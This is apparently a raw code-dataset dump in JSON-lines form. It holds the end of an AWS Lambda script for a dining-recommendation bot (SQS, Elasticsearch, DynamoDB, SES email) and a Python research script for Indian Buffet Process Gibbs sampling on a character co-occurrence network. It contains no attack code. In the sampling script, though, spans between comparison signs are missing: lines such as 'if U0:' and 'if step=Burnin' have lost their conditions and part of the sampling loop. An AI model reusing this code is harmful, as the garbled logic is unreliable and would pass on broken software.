item:\n name = item.get(\"name\", \"Unknown Restaurant\")\n address = item.get(\"address\", \"Unknown Address\")\n restaurant_info.append({\"name\": name, \"address\": address})\n itr += 1\n\n return restaurant_info\n\ndef build_message_to_send(cuisine, location, numOfPeople, date, time, sessionID, b_IDS):\n \"\"\"\n Build the message to send based on retrieved information and Elasticsearch results.\n \"\"\"\n message_to_send = f'Hello! Here are my {cuisine} restaurant suggestions in {location} for {numOfPeople} people, for {date} at {time}:\\n'\n \n # Fetch restaurant information for the given business IDs\n restaurant_info = fetch_restaurant_info(b_IDS, max_results=5)\n restaurant_recommend_msg = f'{cuisine} restaurants\\n'\n \n if restaurant_info:\n for i, info in enumerate(restaurant_info, start=1):\n name = info.get('name', 'Unknown Restaurant')\n address = info.get('address', 'Unknown Address')\n restaurant_recommend_msg += f'{i}. {name}, located at {address}.\\n'\n message_to_send += f'{i}. {name}, located at {address}.\\n'\n else:\n message_to_send += 'No restaurants found for the provided cuisine.\\n'\n \n if sessionID != 'invalid':\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('UserRecommendation')\n item = {\n 'sessionID': sessionID,\n 'recommend': restaurant_recommend_msg,\n }\n response = table.put_item(Item=item)\n\n message_to_send += 'Enjoy your meal!!'\n return message_to_send\n\n\ndef send_email_recommendation(email, message_to_send):\n \"\"\"\n Send the recommendation email to the user.\n \"\"\"\n ses_client = boto3.client('ses', region_name='us-east-1')\n \n try:\n response = ses_client.send_email(\n Destination={\"ToAddresses\": [email]},\n Message={\n 'Subject': {'Data': 'Dining Concierge Recommendation'},\n 'Body': {'Text': {'Data': message_to_send}}\n },\n Source=\"ks4038@columbia.edu\"\n )\n print(\"Email sent successfully.\")\n except Exception as e:\n print(\"Error sending email:\", str(e))\n\n\ndef lambda_handler(event, context):\n # DEFINE THIS AFTER SETTING UP THE SQS\n queue_url = \"https://sqs.us-east-1.amazonaws.com/541457746749/DiningQueue\"\n \n while True:\n \n message = receive_sqs_message(queue_url)\n if message is None:\n print(\"No Message in the Queue right-NOW\")\n break\n \n cuisine, location, date, time, numOfPeople, email, sessionID = retrieve_message_info(message)\n business_ids = find_restaurant_from_elasticsearch(cuisine)\n message_to_send = build_message_to_send(cuisine, location, numOfPeople, date, time, sessionID, business_ids)\n send_email_recommendation(email, message_to_send)\n \n return\n","repo_name":"sinkanishk/Cloud-Computing-and-Big-Data","sub_path":"Dining_BOT/Lambda_functions/LF2.py","file_name":"LF2.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38756173471","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Dec 1 17:42:26 2018\n\n@author: Administrator\n\"\"\"\nimport pandas as pd\nimport scipy.io\nimport numpy as np\nimport datetime\nimport dill\nimport math\nimport matplotlib.pyplot as plt\nfrom IPython.core.pylabtools import figsize\nimport seaborn as sns\n\nfrom scipy.special import gammaln\nnp.set_printoptions(threshold=np.inf)\nnp.random.seed(123)\n\nimport scipy.stats.kde as kde\n\ndef hpd_grid(sample, alpha=0.05, roundto=2):\n \"\"\"Calculate highest posterior density (HPD) of array for given alpha. \n The HPD is the minimum width Bayesian credible interval (BCI). \n The function works for multimodal distributions, returning more than one mode\n\n Parameters\n ----------\n \n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n roundto: integer\n Number of digits after the decimal point for the results\n\n Returns\n ----------\n hpd: array with the lower \n \n \"\"\"\n sample = np.asarray(sample)\n sample = sample[~np.isnan(sample)]\n # get upper and lower bounds\n l = np.min(sample)\n u = np.max(sample)\n density = kde.gaussian_kde(sample)\n x = np.linspace(l, u, 2000)\n y = density.evaluate(x)\n #y = density.evaluate(x, l, u) waitting for PR to be accepted\n xy_zipped = zip(x, y/np.sum(y))\n xy = sorted(xy_zipped, key=lambda x: x[1], reverse=True)\n xy_cum_sum = 0\n hdv = []\n for val in xy:\n xy_cum_sum += val[1]\n hdv.append(val[0])\n if xy_cum_sum >= (1-alpha):\n break\n hdv.sort()\n diff = (u-l)/20 # differences of 5%\n hpd = []\n hpd.append(round(min(hdv), roundto))\n for i in range(1, len(hdv)):\n if hdv[i]-hdv[i-1] >= diff:\n hpd.append(round(hdv[i-1], roundto))\n hpd.append(round(hdv[i], roundto))\n hpd.append(round(max(hdv), roundto))\n ite = iter(hpd)\n hpd = list(zip(ite, ite))\n modes = []\n for value in hpd:\n x_hpd = x[(x > value[0]) & (x < value[1])]\n y_hpd = y[(x > value[0]) & (x < value[1])]\n modes.append(round(x_hpd[np.argmax(y_hpd)], roundto))\n return hpd, x, y, modes\n\ndef plot_post1(sample, alpha=0.05, show_mode=True, kde_plot=True, bins=6, \n ROPE=None, comp_val=None, roundto=2):\n \"\"\"Plot posterior and HPD\n\n Parameters\n ----------\n\n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n show_mode: Bool\n If True the legend will show the mode(s) value(s), if false the mean(s)\n will be displayed\n kde_plot: Bool\n If True the posterior will be displayed using a Kernel Density Estimation\n otherwise an histogram will be used\n bins: integer\n Number of bins used for the histogram, only works when kde_plot is False\n ROPE: list or numpy array\n Lower and upper values of the Region Of Practical Equivalence\n comp_val: float\n Comparison value\n \n\n Returns\n -------\n\n post_summary : dictionary\n Containing values with several summary statistics\n\n \"\"\" \n\n post_summary = {'mean':0,'median':0,'mode':0, 'alpha':0,'hpd_low':0,\n 'hpd_high':0, 'comp_val':0, 'pc_gt_comp_val':0, 'ROPE_low':0,\n 'ROPE_high':0, 'pc_in_ROPE':0}\n\n post_summary['mean'] = round(np.mean(sample), roundto)\n post_summary['median'] = round(np.median(sample), roundto)\n post_summary['alpha'] = alpha\n\n # Compute the hpd, KDE and mode for the posterior\n hpd, x, y, modes = hpd_grid(sample, alpha, roundto)\n print(min(sample))\n post_summary['hpd'] = hpd\n post_summary['mode'] = modes\n\n ## Plot KDE.\n if kde_plot:\n plt.plot(x, y, color='k', lw=2)\n ## Plot histogram.\n else:\n plt.hist(sample, normed=True, bins=bins, facecolor='b', \n edgecolor='w')\n\n ## Display mode or mean:\n if show_mode:\n string = '{:g} ' * len(post_summary['mode'])\n plt.plot(0, label='mode =' + string.format(*post_summary['mode']), alpha=0)\n else:\n plt.plot(0, label='mean = {:g}'.format(post_summary['mean']), alpha=0)\n\n ## Display the hpd.\n hpd_label = ''\n for value in hpd:\n plt.plot(value, [1, 1], linewidth=10, color='b')\n hpd_label = hpd_label + '{:g} {:g}\\n'.format(round(value[0], roundto), round(value[1], roundto)) \n plt.plot(0, 0, linewidth=4, color='b', label='hpd {:g}%\\n{}'.format((1-alpha)*100, hpd_label))\n ## Display the ROPE.\n if ROPE is not None:\n pc_in_ROPE = round(np.sum((sample > ROPE[0]) & (sample < ROPE[1]))/len(sample)*100, roundto)\n plt.plot(ROPE, [0, 0], linewidth=20, color='r', alpha=0.75)\n plt.plot(0, 0, linewidth=4, color='r', label='{:g}% in ROPE'.format(pc_in_ROPE))\n post_summary['ROPE_low'] = ROPE[0] \n post_summary['ROPE_high'] = ROPE[1] \n post_summary['pc_in_ROPE'] = pc_in_ROPE\n ## Display the comparison value.\n if comp_val is not None:\n pc_gt_comp_val = round(100 * np.sum(sample > comp_val)/len(sample), roundto)\n pc_lt_comp_val = round(100 - pc_gt_comp_val, roundto)\n plt.axvline(comp_val, ymax=.75, color='g', linewidth=4, alpha=0.75,\n label='{:g}% < {:g} < {:g}%'.format(pc_lt_comp_val, \n comp_val, pc_gt_comp_val))\n post_summary['comp_val'] = comp_val\n post_summary['pc_gt_comp_val'] = pc_gt_comp_val\n plt.title('HPD of $\\lambda$')\n plt.legend(loc=0, framealpha=1)\n frame = plt.gca()\n frame.axes.get_yaxis().set_ticks([])\n return post_summary\n\ndef plot_post2(sample, alpha=0.05, show_mode=True, kde_plot=True, bins=6, \n ROPE=None, comp_val=None, roundto=2):\n \"\"\"Plot posterior and HPD\n\n Parameters\n ----------\n\n sample : Numpy array or python list\n An array containing MCMC samples\n alpha : float\n Desired probability of type I error (defaults to 0.05)\n show_mode: Bool\n If True the legend will show the mode(s) value(s), if false the mean(s)\n will be displayed\n kde_plot: Bool\n If True the posterior will be displayed using a Kernel Density Estimation\n otherwise an histogram will be used\n bins: integer\n Number of bins used for the histogram, only works when kde_plot is False\n ROPE: list or numpy array\n Lower and upper values of the Region Of Practical Equivalence\n comp_val: float\n Comparison value\n \n\n Returns\n -------\n\n post_summary : dictionary\n Containing values with several summary statistics\n\n \"\"\" \n\n post_summary = {'mean':0,'median':0,'mode':0, 'alpha':0,'hpd_low':0,\n 'hpd_high':0, 'comp_val':0, 'pc_gt_comp_val':0, 'ROPE_low':0,\n 'ROPE_high':0, 'pc_in_ROPE':0}\n\n post_summary['mean'] = round(np.mean(sample), roundto)\n post_summary['median'] = round(np.median(sample), roundto)\n post_summary['alpha'] = alpha\n\n # Compute the hpd, KDE and mode for the posterior\n hpd, x, y, modes = hpd_grid(sample, alpha, roundto)\n print(min(sample))\n post_summary['hpd'] = hpd\n post_summary['mode'] = modes\n\n ## Plot KDE.\n if kde_plot:\n plt.plot(x, y, color='k', lw=2)\n ## Plot histogram.\n else:\n plt.hist(sample, normed=True, bins=bins, facecolor='b', \n edgecolor='w')\n\n ## Display mode or mean:\n if show_mode:\n string = '{:g} ' * len(post_summary['mode'])\n plt.plot(0, label='mode =' + string.format(*post_summary['mode']), alpha=0)\n else:\n plt.plot(0, label='mean = {:g}'.format(post_summary['mean']), alpha=0)\n\n ## Display the hpd.\n hpd_label = ''\n for value in hpd:\n plt.plot(value, [1, 1], linewidth=10, color='b')\n hpd_label = hpd_label + '{:g} {:g}\\n'.format(round(value[0], roundto), round(value[1], roundto)) \n plt.plot(0, 0, linewidth=4, color='b', label='hpd {:g}%\\n{}'.format((1-alpha)*100, hpd_label))\n ## Display the ROPE.\n if ROPE is not None:\n pc_in_ROPE = round(np.sum((sample > ROPE[0]) & (sample < ROPE[1]))/len(sample)*100, roundto)\n plt.plot(ROPE, [0, 0], linewidth=20, color='r', alpha=0.75)\n plt.plot(0, 0, linewidth=4, color='r', label='{:g}% in ROPE'.format(pc_in_ROPE))\n post_summary['ROPE_low'] = ROPE[0] \n post_summary['ROPE_high'] = ROPE[1] \n post_summary['pc_in_ROPE'] = pc_in_ROPE\n ## Display the comparison value.\n if comp_val is not None:\n pc_gt_comp_val = round(100 * np.sum(sample > comp_val)/len(sample), roundto)\n pc_lt_comp_val = round(100 - pc_gt_comp_val, roundto)\n plt.axvline(comp_val, ymax=.75, color='g', linewidth=4, alpha=0.75,\n label='{:g}% < {:g} < {:g}%'.format(pc_lt_comp_val, \n comp_val, pc_gt_comp_val))\n post_summary['comp_val'] = comp_val\n post_summary['pc_gt_comp_val'] = pc_gt_comp_val\n plt.title('HPD of $\\alpha$')\n plt.legend(loc=0, framealpha=1)\n frame = plt.gca()\n frame.axes.get_yaxis().set_ticks([])\n return post_summary\n\ndef data_flag(data):\n n=np.shape(data)[0]\n flagi=np.zeros(n).astype(int)\n flagj=np.zeros(n).astype(int)\n flag=np.zeros(n).astype(int)\n singlevi=[]\n singlevj=[]\n for i in range(n):\n nz=np.nonzero(data[i,:])\n flagi[i]=np.shape(nz[0])[0]\n if flagi[i]==1:\n wv=sum(data[i,:])\n singlevi.append((i,wv))\n if wv<3:\n flagi[i]=0\n for i in range(n):\n nz=np.nonzero(data[:,i])\n flagj[i]=np.shape(nz[0])[0]\n if flagj[i]==1:\n wv=sum(data[:,i])\n singlevj.append((i,wv))\n if wv<3:\n flagj[i]=0\n flag[i]=max(flagi[i],flagj[i]) \n return flag,singlevi,singlevj\ndef clear_Z(Z,flag):\n n=np.shape(Z)[0]\n for i in range(n):\n if flag[i]==0:\n Z[i,:]=0\n return Z\ndef cal_totalEv(X):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n e_v=np.zeros(edge_num).astype(int)\n log_v=np.zeros(edge_num)\n for i in range(edge_num):\n V=e_v[i]=data[nonzero[0][i],nonzero[1][i]].astype(int)\n for j in range(V):\n log_v[i]+=np.log(j+1)\n return sum(e_v),sum(log_v),e_v\ndef cal_expo(X,Z,total_Ev,logTEV,e_v):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n expo=np.zeros(edge_num)\n log_expo=np.zeros(edge_num)\n log_default=np.log(1E-5) \n part1=0 \n for i in range(edge_num):\n expo[i]=sum(Z[nonzero[0][i],:]*Z[nonzero[1][i],:])\n# expoflag=0\n# expo_min=min(expo)\n# if expo_min<0:\n# print('expoflag_min')\n# expo+=np.abs(expo_min)\n# expoflag=1\n# for i in range(edge_num):\n if expo[i]!=0:\n log_expo[i]=np.log(expo[i])\n else:\n log_expo[i]=log_default \n part1+=e_v[i]*log_expo[i] \n \n return part1\n\ndef likelihood(X,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5):\n part1=cal_expo(X,Z,total_Ev,logTEV,e_v)\n Z=np.mat(Z)\n aa=np.dot(Z,Z.T)\n totalshareC=np.sum(np.reshape(aa,(aa.size,)))\n part6=(totalshareC+b)*Rho\n return part1-part2+part3+part5-part4-part6,totalshareC \n\ndef sampleIBP(alpha, num_objects): \n # Initializing storage for results\n result = np.zeros([num_objects, 1000]).astype(int)\n # Draw from the prior for alpha\n alpha_N=alpha/np.arange(1,num_objects+1)\n Knews = np.random.poisson(alpha_N)\n # Filling in first row of result matrix\n if Knews[0]==0:\n Knews[0]=1\n t=Knews[0]\n result[0, 0:t] = np.ones(t) #changed form np.ones([1, t])\n # Initializing K+\n K_plus = t\n for i in range(1, num_objects):\n for j in range(0, K_plus):\n mk=np.sum(result[0:i,j])\n nmk=i - mk\n logmk=1E-5\n lognmk=1E-5\n if mk!=0:\n logmk=np.log(mk)\n if nmk!=0:\n lognmk=np.log(nmk) \n p = np.array([logmk - np.log(i+1), \n lognmk - np.log(i+1)])\n p = np.exp(p - max(p))\n if(np.random.uniform(0,1) < p[0]/np.sum(p)):\n result[i, j] = 1\n else:\n result[i, j] = 0\n t = Knews[i]\n x = K_plus + 1\n y = K_plus + t\n result[i, (x-1):y] = np.ones(t) #changed form np.ones([1, t])\n K_plus = K_plus+t\n# print(\"---ff is:\",ff()-1)\n result = result[:, 0:K_plus]\n# for k in range(K_plus):\n# print(np.shape(np.nonzero(result[:,k])[0]))\n return list([result, K_plus])\ndef cal_Pois(alpha,num_objects,maxNew): \n alphaN = alpha/num_objects\n pois = np.zeros(maxNew) \n for new in range(maxNew):\n pois[new] = new*np.log(alphaN) - alphaN - np.log(math.factorial(new))\n return pois\ndef Gibbs_z_a(flag,Z,data,num_objects,a,b,alpha,maxNew,Rho,total_Ev,e_v,part2,part3,part4,part5,pois):\n\n for i in range(0, num_objects):\n if flag[i]!=0:\n P=np.zeros(2) \n \n K_plus=np.shape(Z)[1]\n for k in range(K_plus):\n if (k>=K_plus):\n break\n if K_plus==1:\n break\n if np.sum(Z[:,k])-Z[i,k]==0:\n # print('--------------------------------------merged---------%d++++'% e)\n Z[:, k:(K_plus - 1)] = Z[:, (k+1):K_plus]\n \n K_plus = K_plus - 1\n Z = Z[:, 0:K_plus]\n continue\n Z[i,k] = 0\n [lik,_] = likelihood(data,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5)\n P[0] = lik + np.log(num_objects-np.sum(Z[:,k])) - np.log(num_objects)\n Z[i,k] = 1\n [lik,_] = likelihood(data,Z,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5) \n P[1] = lik + np.log(np.sum(Z[:,k])- 1) - np.log(num_objects)\n P = np.exp(P - max(P))\n U = np.random.uniform(0,1)\n if U<(P[1]/(np.sum(P))):\n Z[i,k] = 1\n else:\n Z[i,k] = 0 \n #Sample number of new features\n prob = np.zeros(maxNew)\n lik = np.zeros(maxNew)\n Tsc=np.zeros(maxNew)\n \n for new in range(maxNew): # max new features is 3\n ZZ = Z \n if new>0:\n newcol = np.zeros((num_objects, new)).astype(int)\n newcol[i,:] = 1 \n ZZ = np.column_stack((ZZ, newcol))\n #Calculate the probability of kNew new features for object i\n \n [ll,tsc]=likelihood(data,ZZ,Rho,a,b,total_Ev,e_v,part2,part3,part4,part5) \n lik[new] =ll\n Tsc[new] =tsc\n prob[new] = pois[new] + ll\n #normalize prob and select the most likely number of new features\n prob = np.exp(prob - max(prob))\n prob = prob/sum(prob)\n U = np.random.uniform(0,1,1)\n p = 0\n kNew=0\n for new in range(maxNew):\n p = p+prob[new]\n if U0:\n \n newcol = np.zeros((num_objects, kNew)).astype(int)\n newcol[i,:] = 1 \n Z = np.column_stack((Z, newcol))\n K_plus = K_plus + kNew\n loglk= lik[kNew]\n totalshareC=Tsc[kNew]\n return Z,loglk,totalshareC\n\ndef harmi(num_objects):\n HN = 0\n for i in range(0, num_objects):\n HN = HN + 1/(i+1)\n return HN \n \ndef simulateNetwork(Z,Rho):\n N=np.shape(Z)[0]\n data=np.zeros((N,N)).astype(int)\n for i in range(N):\n for j in range(N-i):\n if i!=j:\n rho=sum(Z[i,:]*Z[j,:])*Rho\n# print(rho)\n data[i,j]=np.random.poisson(rho)\n# data[j,i]=data[i,j]\n# print(data)\n# st=input(\"continu\")\n return data\ndef tune_Z(Z):\n K_plus=np.shape(Z)[1]\n out=np.zeros(np.shape(Z)).astype(int)\n i=0 \n for k in range(K_plus):\n if (k>=K_plus):\n break\n if K_plus==1:\n break\n if np.sum(Z[:,k])>2:\n out[:,i]=Z[:,k]\n i+=1\n out = out[:,0:i]\n return out\ndef hpd(post):\n# sns.distplot(post)\n figsize(10.5, 3)\n HDP=np.percentile(post,[2.5,97.5])\n plt.plot(HDP,[0,0],label='HDP{:.2f}{:.2f}'.format(*HDP),linewidth=8,color='k')\n plt.legend(fontsize=16)\n plt.xlabel(r'$\\alpha$',fontsize=14)\n plt.gca().axes.get_yaxis().set_ticks([])\n plt.show()\ndef network_from_csv(csvfile):\n d = pd.read_csv(csvfile, usecols=['Source', 'Target', 'Weight'])\n d=np.array(d)\n n=d.shape[0]\n data=np.zeros((n,n)).astype(int) \n for i in range(1,n):\n data[d[i,0],d[i,1]]=d[i,2]\n return data \ndef summary_K(chain_K):\n k1=chain_K>1\n k2=k1*chain_K\n k2=k2.astype(int)\n k3=set(k2)\n k4=list(k3)\n if np.shape(k4)[0]>1:\n k4.pop(k4[0])\n zz=[]\n kk=[]\n a_f=[]\n kmaxl=0\n for _ in list(k4):\n temp=np.where(k2==_)[0]\n kk.append(temp)\n if np.shape(temp)[0]>kmaxl:\n kmaxl=np.shape(temp)[0]\n kmax=temp\n kkk=_\n times=0\n for i in list(kmax):\n zz.append(chain_Z[i])\n a_f.append(chain_alpha[i])\n times=times+1\n return times,kmax,zz,a_f,kkk\ndef plot_histo(chain_ks,chain_K,chain_alpha,chain_Rho):\n figsize(10.5, 16)\n ax = plt.subplot(411)\n ax.set_autoscaley_on(False)\n plt.title(\"Posterior distributions of K_plus and alpha\") \n plt.xlim([1,50])\n plt.xlabel(\"K_plus value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_ks, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of K_plus\", color=\"#A60628\", normed=True)\n plt.legend(loc=\"upper right\") \n ax = plt.subplot(412)\n ax.set_autoscaley_on(False)\n plt.title(\"Posterior distributions of K_plus and alpha\") \n plt.xlim([1,50])\n plt.xlabel(\"K_plus value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_K, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of K_plus\", color=\"#A60628\", normed=True)\n plt.legend(loc=\"upper right\") \n ax = plt.subplot(413)\n ax.set_autoscaley_on(False)\n plt.xlim([0.1,6.6])\n plt.xlabel(\"alpha value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_alpha, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of $\\lambda_2$\", color=\"#467821\", normed=True)\n plt.legend(loc=\"upper right\")\n ax = plt.subplot(414)\n ax.set_autoscaley_on(False)\n plt.xlim([0.1,6.6])\n plt.xlabel(\"Rho value\")\n plt.ylabel(\"Density\")\n plt.hist(chain_Rho, histtype='stepfilled', bins=30, alpha=0.85,\n label=\"posterior of $\\lambda_2$\", color=\"#467821\", normed=True)\n plt.legend(loc=\"upper right\")\n plt.show()\ndef plot_scatter(chain_K,chain_alpha):\n figsize(16.5, 12)\n xValue = list(range(0, maxI)) \n yValue = chain_K[0:maxI] \n plt.xlabel('x-value') \n plt.ylabel('y-label') \n plt.scatter(xValue, yValue)\n plt.show()\n plt.figure('Line fig') \n xValue = list(range(0, maxI)) \n yValue = chain_K[0:maxI] \n ax = plt.gca() #设置x轴、y轴名称 \n ax.set_xlabel('x') \n ax.set_ylabel('y') #画连线图,以x_list中的值为横坐标,以y_list中的值为纵坐标 #参数c指定连线的颜色,linewidth指定连线宽度,alpha指定连线的透明度 \n ax.plot(xValue, yValue, color='r', linewidth=1, alpha=0.6) \n plt.show()\n \n figsize(16.5, 12)\n xValue = list(range(0, maxI)) \n yValue = chain_alpha[0:maxI] \n plt.xlabel('x-value') \n plt.ylabel('y-label') \n plt.scatter(xValue, yValue)\n plt.show() \ndef graph_stat(X):\n nonzero=np.nonzero(X) \n edge_num=np.shape(nonzero)[1]\n e_v=np.zeros(edge_num).astype(int)\n for i in range(edge_num):\n e_v[i]=data[nonzero[0][i],nonzero[1][i]].astype(int) \n return edge_num,max(e_v),min(e_v),sum(e_v) \ndef write_graph(step,file,net,ZZ):\n nodeFlag=0\n N=np.shape(net)[0]\n K=np.shape(ZZ)[1]\n ct=str(N)+' '+str(K)+' '+str(step)\n file.write(ct)\n file.write(\" \\n \")\n for j in range(N):\n nb=np.nonzero(net[j])\n nbs=np.shape(nb)[1]\n nz=np.nonzero(ZZ[j])\n nzs=np.shape(nz)[1]\n if nbs>0:\n nodeFlag=1\n nbb=' '\n for nnb in nb[0]:\n ncb=str(nnb)+' '\n nbb=nbb+ncb\n if nzs>0:\n for nnz in nz[0]:\n ncz=str(nnz)+' '\n nbb=nbb+ncz\n else:\n nbb=' '\n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\") \ndef write_mat(seed):\n for i in list(seed):\n ZZ=chain_Z[i]\n K=chain_K[i]\n Rho=chain_Rho[i]\n alpha=chain_alpha[i]\n net=simulateNetwork(ZZ,Rho)\n fn=str(K)+'.mat'\n scipy.io.savemat(fn,{'a':a,'b':b,'Rho':Rho,'alpha':alpha,'Z':ZZ,'net':net})\n# if chain_K[i]==6:\n# print('6----',i)\n# if chain_K[i]==7:\n# print('7----',i)\n# if chain_K[i]==8:\n# print('8----',i)\ndef plotl(d):\n figEx1=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='g',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('$\\lambda$ Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of $\\lambda$')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx1.savefig(filename+'.png')\n plt.close()\ndef plota(d):\n figEx2=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='b',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('alpha Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of alpha')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx2.savefig(filename+'.png')\n plt.close()\ndef plotk(d):\n figEx3=plt.figure(figsize=(4, 4))\n n, bins, patches = plt.hist(x=d, bins='auto', color='b',\n alpha=0.7, rwidth=0.85)\n plt.grid(axis='y', alpha=0.75)\n plt.xlabel('K Value')\n plt.ylabel('Frequency')\n plt.title('Histogram of $K_s$')\n\n plt.grid(True)\n\n filename='K'\n plt.show()\n figEx3.savefig(filename+'.png')\n plt.close()\ndef write_graphs(step,file,net,ZZ):\n nodeFlag=0\n N=np.shape(net)[0]\n K=np.shape(ZZ)[1]\n ct=str(N)+' '+str(K)+' '+str(step)\n\n file.write(ct)\n file.write(\" \\n \")\n net+=net.T\n for j in range(N):\n nodeFlag=0\n nb=np.nonzero(net[j])\n nbs=np.shape(nb)[1]\n nbb=' '\n if nbs>0:\n nodeFlag=1\n \n for nnb in nb[0]:\n ncb=str(nnb)\n nbb=nbb+' '+ncb\n for nnz in range(K):\n# print(ZZ[j,nnz])\n ncz=str(ZZ[j,nnz])\n nbb=nbb+' '+ncz\n\n if K==14:\n nbb=nbb+' '+str(0)+' '+str(0)\n if K==15:\n nbb=nbb+' '+str(0) \n if nbs==0:\n nbb='' \n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\")\ndef counter():\n x=0\n def add():\n nonlocal x\n x+=1\n return x\n return add\ndef write_data(data,ZZZZ):\n f2n= 'originalGraph.txt'\n file=open(f2n,'a')\n N=np.shape(data)[0] \n \n ct=str(N)+' \\n'\n file.write(ct)\n for j in range(N):\n nodeFlag=0\n nb=np.nonzero(data[j])\n nbs=np.shape(nb)[1]\n \n \n K=np.shape(ZZZZ)[1]\n if nbs>0:\n nodeFlag=1\n nbb=' '\n for nnb in nb[0]:\n ncb=str(nnb)+' '\n nbb=nbb+ncb\n for nnz in range(K):\n# print(ZZ[j,nnz])\n ncz=str(ZZZZ[j,nnz])\n nbb=nbb+' '+ncz\n nbb=nbb+' '+str(0)\n\n content=str(nodeFlag)+' '+str(nbs)+nbb\n file.write(content)\n file.write(\" \\n\")\na=np.random.gamma(1,1)\nb=np.random.gamma(1,1)\n#mat=scipy.io.loadmat('yur.mat')\n#matr=scipy.io.loadmat('yu.mat')\n#a=mat['a']\n#b=mat['b']\n#alpha=mat['alpha']\n#data = np.loadtxt(\"eron_net.txt\", delimiter=\",\")\nRho = np.random.gamma(a,b)\n#Rho=mat['Rho']\n#Z=mat['ZZ']\n#data=mat['net']\ncsvfile='lesmis.csv'\ndata=network_from_csv(csvfile)\n#data=data+data.T\n[flag,svi,svj]=data_flag(data)\n#scipy.io.savemat('net.mat',{'net':net})\n#dataI=scipy.io.loadmat('net.mat')\nN=np.shape(data)[0]\n#N=30\nHN=harmi(N)\nalpha = np.random.gamma(24,1/(1+HN))\n[Z, K_plus] = sampleIBP(alpha, N)\nZ=clear_Z(Z,flag)\n#K_plus=np.shape(Z)[1]\nZZZ=tune_Z(Z)\nprint(ZZZ)\nst=input(\"continu\")\n#data=simulateNetwork(ZZZ,Rho)\nprint(data)\nst=input(\"continu\")\nnum_objects=np.shape(data)[0]\n#Set number of iterations\nmaxI = 10000\nBurnin =4000\ngNumber=maxI-Burnin\n[total_Ev,logTEV,e_v]=cal_totalEv(data)\n#Set truncation limit for max number of sampled latent features\n#Set storage arrays for sampled parameters\nchain_Z =[]\nchain_K = np.zeros(gNumber).astype(int)\nchain_alpha = np.zeros(gNumber)\nchain_Rho = np.zeros(gNumber)\n#Initialize parameter values\n#alpha = np.random.gamma(1,1/(1+HN))\n#[Z, K_plus] = sampleIBP(alpha, num_objects)\nloglkMax=-np.inf\nmaxNew=5\npois=cal_Pois(alpha,num_objects,maxNew)\npart2=logTEV\nchain_graphs=[]\npart4=gammaln(a)\npart5=a*np.log(b) \n[ne,maxe,mine,sume]=graph_stat(data)\nnowTime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n#filename= 'save'+nowTime+'.txt'\n#f2= 'stat'+nowTime+'.txt'\nfilename= 'YU_l44.txt'\nfile=open(filename,'a')\n#file=open(f2,'a')\n#file.write(str(gNumber)+\" \\n\")\n#f2.write('*** '+str(ne)+' '+str(maxe)+' '+str(mine)+' '+str(sume)+\" \\n\")\n#nodeFlag=0\nchain_a= np.zeros(gNumber)\nchain_b= np.zeros(gNumber)\nchain_ks=[]\ntrueK=14\nc1=counter()\nc2=counter()\nc3=counter()\nfor step in range(0, maxI):\n if step=Burnin:\n \n if K>0:\n chain_alpha[step-Burnin] = alpha\n chain_Rho[step-Burnin] = Rho\n chain_Z.append(ZZ)\n# chain_ll[step-Burnin] = loglk \n chain_K[step-Burnin]=K\n chain_a[step-Burnin] = total_Ev+a\n chain_b[step-Burnin] = totalshareC+b\n if K==trueK-1 or K==trueK or K==trueK+1:\n net=simulateNetwork(ZZ,Rho)\n## graph=adaj_network(net)\n# chain_graphs.append(net)\n# [ne,maxe,mine,sume]=graph_stat(net)\n# f2.write(str(step)+' '+str(ne)+' '+str(maxe)+' '+str(mine)+' '+str(sume)+\" \\n\")\n write_graph(step,file,net,ZZ)\n if K==trueK-1:\n c1()\n if K==trueK:\n c2()\n if K==trueK+1:\n c3()\n print(\"At iteration\", step, \": K is\", K, \", alpha is\", alpha)\n\n alpha = np.random.gamma(1 + K_plus, 1/(1+HN)) \n#def plot_line(data,start,end,filename):\n# figx=plt.figure(figsize=(16.5, 12))\n# plt.figure('Line fig') \n# xValue = list(range(start,end)) \n# yValue = data[start:end] \n# ax = plt.gca() #设置x轴、y轴名称 \n# ax.set_xlabel('iteration') \n# ax.set_ylabel('K') #画连线图,以x_list中的值为横坐标,以y_list中的值为纵坐标 #参数c指定连线的颜色,linewidth指定连线宽度,alpha指定连线的透明度 \n# ax.plot(xValue, yValue, color='b', linewidth=1, alpha=0.6) \n# plt.show()\n# figx.savefig(filename+'.png')\n# plt.close() \n#file.close() \n#f2.close() \n#scipy.io.savemat('yu'+nowTime+'.mat',{'a':total_Ev+a,'b':totalshareC+b,'Rho':Rho,'alpha':alpha,'ZZ':ZZ,'net':net})\n#hpd(chain_alpha)\n#plot_histo(chain_ks,chain_K,chain_alpha,chain_Rho)\n#plot_scatter(chain_K,chain_alpha)\n#for k 